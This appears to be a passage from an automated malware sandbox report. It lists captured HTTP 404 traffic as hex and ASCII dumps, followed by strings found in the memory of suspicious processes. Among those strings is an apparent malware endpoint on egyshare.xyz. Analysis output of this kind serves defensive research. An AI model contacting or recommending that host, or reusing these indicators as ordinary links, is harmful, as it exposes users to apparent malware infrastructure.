20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 11:18:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 11:18:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 11:18:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:18:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:18:49 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:18:51 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:18:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 10 Dec 2024 11:41:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeETag: W/"5d07e874-36b"Content-Encoding: gzipData Raw: 31 63 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b5 53 cd 8e d3 40 0c be e7 29 cc 9e b7 1d 10 e2 52 86 48 ab c2 a1 07 16 84 2a 24 8e 6e c6 69 46 4a c6 c1 e3 6c 54 21 de 1d 4f d2 65 81 0b 5c c8 25 33 8e ed ef c7 8e 7f f6 f6 c3 fe f8 e5 e3 3b e8 74 e8 eb ca 3f be 08 83 dd 34 6a 4f f5 67 92 d8 c6 06 35 72 02 6e 61 cf 49 b1 51 38 a4 96 65 58 c2 de ad a9 95 cf 7a b1 92 0a ec 39 71 b8 c0 b7 e5 58 ae 73 0c da ed e0 e5 2b 1a 5e ff 0c 0e 28 e7 98 76 f0 1c 70 52 7e 8a b7 86 b1 69 71 88 fd 65 07 47 ec 78 c0 5b 30 22 01 93 1d ee 24 62 7f 0b 19 53 de e4 c2 6e 2d fc 5e 79 77 c5 f7 ae 5b 25 14 12 45 d7 8b 7f 93 61 79 95 1f eb 63 47 10 0c 33 26 88 19 94 86 91 05 c5 c8 80 59 d0 71 1f 60 a4 14 62 3a c3 c3 1f e6 a8 55 92 15 f6 80 21 08 e5 5c 1c 2b c1 4f 74 8e 59 05 93 02 66 2b 97 25 7a d8 df dd df 83 4c 3d 59 62 2a 0a ff 66 f5 d6 bb b1 ae 0a c9 f7 2c c6 92 d4 c0 1e 51 32 5d 7b 35 98 e0 44 d0 f2 94 02 a0 ee fc 49 9c 29 43 e8 84 da 37 37 9d ea b8 73 6e 9e e7 ad 0d 36 a5 2d cb d9 51 72 46 98 27 69 28 bb 86 87 b1 8f 98 1a 5a 8f 66 85 66 fb be 8a 90 92 b0 6c c1 e6 57 03 6e ea ff d4 d8 3b ac 9f 84 1f 5a b8 f0 04 68 f2 8b b3 3c 27 73 73 b1 d9 86 75 1d db d8 13 9a 1b 57 96 25 5f 60 14 7e 88 c1 72 d1 4c 11 fa 3a 51 56 7b ff 26 01 58 cc b5 be e7 79 e9 1d 93 cd 6c 6a ca ea e7 75 ae 14 40 79 c1 cf 1d 8b da 4a 60 ab d6 73 41 60 b1 f6 2b 51 ef ae ab e7 d6 7f ea 07 31 da 86 40 6b 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1c5S@)RH*$niFJlT!Oe\%3;t?4jOg5rnaIQ8eXz9qXs+^(vpR~iqeGx[0"$bSn-^yw[%EaycG3&Yq`b:U!\+OtYf+%zL=Yb*f,Q2]{5DI)C77sn6-QrF'i(ZfflWn;Zh<'ssuW%_`~rL:QV{&Xylju@yJ`sA`+Q1@k0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 10 Dec 2024 11:41:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeETag: W/"5d07e874-36b"Content-Encoding: gzipData Raw: 31 63 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b5 53 cd 8e d3 40 0c be e7 29 cc 9e b7 1d 10 e2 52 86 48 ab c2 a1 07 16 84 2a 24 8e 6e c6 69 46 4a c6 c1 e3 6c 54 21 de 1d 4f d2 65 81 0b 5c c8 25 33 8e ed ef c7 8e 7f f6 f6 c3 fe f8 e5 e3 3b e8 74 e8 eb ca 3f be 08 83 dd 34 6a 4f f5 67 92 d8 c6 06 35 72 02 6e 61 cf 49 b1 51 38 a4 96 65 58 c2 de ad a9 95 cf 7a b1 92 0a ec 39 71 b8 c0 b7 e5 58 ae 73 0c da ed e0 e5 2b 1a 5e ff 0c 0e 28 e7 98 76 f0 1c 70 52 7e 8a b7 86 b1 69 71 88 fd 65 07 47 ec 78 c0 5b 30 22 01 93 1d ee 24 62 7f 0b 19 53 de e4 c2 6e 2d fc 5e 79 77 c5 f7 ae 5b 25 14 12 45 d7 8b 7f 93 61 79 95 1f eb 63 47 10 0c 33 26 88 19 94 86 91 05 c5 c8 80 59 d0 71 1f 60 a4 14 62 3a c3 c3 1f e6 a8 55 92 15 f6 80 21 08 e5 5c 1c 2b c1 4f 74 8e 59 05 93 02 66 2b 97 25 7a d8 df dd df 83 4c 3d 59 62 2a 0a ff 66 f5 d6 bb b1 ae 0a c9 f7 2c c6 92 d4 c0 1e 51 32 5d 7b 35 98 e0 44 d0 f2 94 02 a0 ee fc 49 9c 29 43 e8 84 da 37 37 9d ea b8 73 6e 9e e7 ad 0d 36 a5 2d cb d9 51 72 46 98 27 69 28 bb 86 87 b1 8f 98 1a 5a 8f 66 85 66 fb be 8a 90 92 b0 6c c1 e6 57 03 6e ea ff d4 d8 3b ac 9f 84 1f 5a b8 f0 04 68 f2 8b b3 3c 27 73 73 b1 d9 86 75 1d db d8 13 9a 1b 57 96 25 5f 60 14 7e 88 c1 72 d1 4c 11 fa 3a 51 56 7b ff 26 01 58 cc b5 be e7 79 e9 1d 93 cd 6c 6a ca ea e7 75 ae 14 40 79 c1 cf 1d 8b da 4a 60 ab d6 73 41 60 b1 f6 2b 51 ef ae ab e7 d6 7f ea 07 31 da 86 40 6b 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1c5S@)RH*$niFJlT!Oe\%3;t?4jOg5rnaIQ8eXz9qXs+^(vpR~iqeGx[0"$bSn-^yw[%EaycG3&Yq`b:U!\+OtYf+%zL=Yb*f,Q2]{5DI)C77sn6-QrF'i(ZfflWn;Zh<'ssuW%_`~rL:QV{&Xylju@yJ`sA`+Q1@k0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 10 Dec 2024 11:41:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeETag: W/"5d07e874-36b"Content-Encoding: gzipData Raw: 31 63 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b5 53 cd 8e d3 40 0c be e7 29 cc 9e b7 1d 10 e2 52 86 48 ab c2 a1 07 16 84 2a 24 8e 6e c6 69 46 4a c6 c1 e3 6c 54 21 de 1d 4f d2 65 81 0b 5c c8 25 33 8e ed ef c7 8e 7f f6 f6 c3 fe f8 e5 e3 3b e8 74 e8 eb ca 3f be 08 83 dd 34 6a 4f f5 67 92 d8 c6 06 35 72 02 6e 61 cf 49 b1 51 38 a4 96 65 58 c2 de ad a9 95 cf 7a b1 92 0a ec 39 71 b8 c0 b7 e5 58 ae 73 0c da ed e0 e5 2b 1a 5e ff 0c 0e 28 e7 98 76 f0 1c 70 52 7e 8a b7 86 b1 69 71 88 fd 65 07 47 ec 78 c0 5b 30 22 01 93 1d ee 24 62 7f 0b 19 53 de e4 c2 6e 2d fc 5e 79 77 c5 f7 ae 5b 25 14 12 45 d7 8b 7f 93 61 79 95 1f eb 63 47 10 0c 33 26 88 19 94 86 91 05 c5 c8 80 59 d0 71 1f 60 a4 14 62 3a c3 c3 1f e6 a8 55 92 15 f6 80 21 08 e5 5c 1c 2b c1 4f 74 8e 59 05 93 02 66 2b 97 25 7a d8 df dd df 83 4c 3d 59 62 2a 0a ff 66 f5 d6 bb b1 ae 0a c9 f7 2c c6 92 d4 c0 1e 51 32 5d 7b 35 98 e0 44 d0 f2 94 02 a0 ee fc 49 9c 29 43 e8 84 da 37 37 9d ea b8 73 6e 9e e7 ad 0d 36 a5 2d cb d9 51 72 46 98 27 69 28 bb 86 87 b1 8f 98 1a 5a 8f 66 85 66 fb be 8a 90 92 b0 6c c1 e6 57 03 6e ea ff d4 d8 3b ac 9f 84 1f 5a b8 f0 04 68 f2 8b b3 3c 27 73 73 b1 d9 86 75 1d db d8 13 9a 1b 57 96 25 5f 60 14 7e 88 c1 72 d1 4c 11 fa 3a 51 56 7b ff 26 01 58 cc b5 be e7 79 e9 1d 93 cd 6c 6a ca ea e7 75 ae 14 40 79 c1 cf 1d 8b da 4a 60 ab d6 73 41 60 b1 f6 2b 51 ef ae ab e7 d6 7f ea 07 31 da 86 40 6b 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1c5S@)RH*$niFJlT!Oe\%3;t?4jOg5rnaIQ8eXz9qXs+^(vpR~iqeGx[0"$bSn-^yw[%EaycG3&Yq`b:U!\+OtYf+%zL=Yb*f,Q2]{5DI)C77sn6-QrF'i(ZfflWn;Zh<'ssuW%_`~rL:QV{&Xylju@yJ`sA`+Q1@k0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 10 Dec 2024 11:41:44 GMTContent-Type: text/htmlContent-Length: 875Connection: closeETag: "5d07e874-36b"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 56 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 43 6f 6e 74 61 63 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 56 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 43 6f 6e 74 61 63 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 6d 61 69 6e 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6f 6e 20 68 6f 6c 64 20 70 65 6e 64 69 6e 67 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 20 6f 66 20 74 68 65 20 52 65 67 69 73 74 72 61 6e 74 20 61 73 20 70 65 72 20 74 68 65 20 49 43 41 4e 4e 20 72 75 6c 65 73 20 6f 6e 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 43 6f 6e 74 61 63 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 0a 3c 70 3e 4d 6f 72 65 20 64 65 74 61 69 6c 73 20 6f 66 20 74 68 65 73 65 20 72 75 6c 65 73 20 63 61 6e 20 62 65 20 66 6f 75 6e 64 20 61 74 3a 3c 62 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 63 61 6e 6e 2e 6f 72 67 2f 65 6e 2f 72 65 73 6f 75 72 63 65 73 2f 63 6f 6d 70 6c 69 61 6e 63 65 2f 63 6f 6d 70 6c 61 69 6e 74 73 2f 72 65 67 69 73 74 72 61 72 73 2f 63 6f 6e 74 61 63 74 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 69 63 61 6e 6e 2e 6f 72 67 2f 65 6e 2f 72 65 73 6f 75 72 63 65 73 2f 63 6f 6d 70 6c 69 61 6e 63 65 2f 63 6f 6d 70 6c 61 69 6e 74 73 2f 72 65 67 69 73 74 72 61 72 73 2f 63 6f 6e 74 61 63 74 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 3c 2f 61 3e 2e 3c 2f 70 3e 0a 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 64 6f 6d 61 69 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 70 72 6f 76 69 64 65 72 20 61 6e 64 20 72 65 71 75 65 73 74 20 72 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 72 20 66 6f 6c 6c 6f 77 20 74 68 65 20 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 65 6d 61 69 6c 65 64 20 74 6f 20 79 6f 75 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 79 6f 75 72 20 6f 72 64 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>Verification of Contact Information</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:20:35 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:20:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:20:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:20:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: mGAzNmDsKUvf.exe, 00000007.00000002.4108279577.0000000004B66000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.egyshare.xyz
            Source: mGAzNmDsKUvf.exe, 00000007.00000002.4108279577.0000000004B66000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.egyshare.xyz/lp5b/
            Source: mGAzNmDsKUvf.exe, 00000007.00000002.4106766199.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icann.org/en/resources/compliance/complaints/registrars/contact-verification
            Source: wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
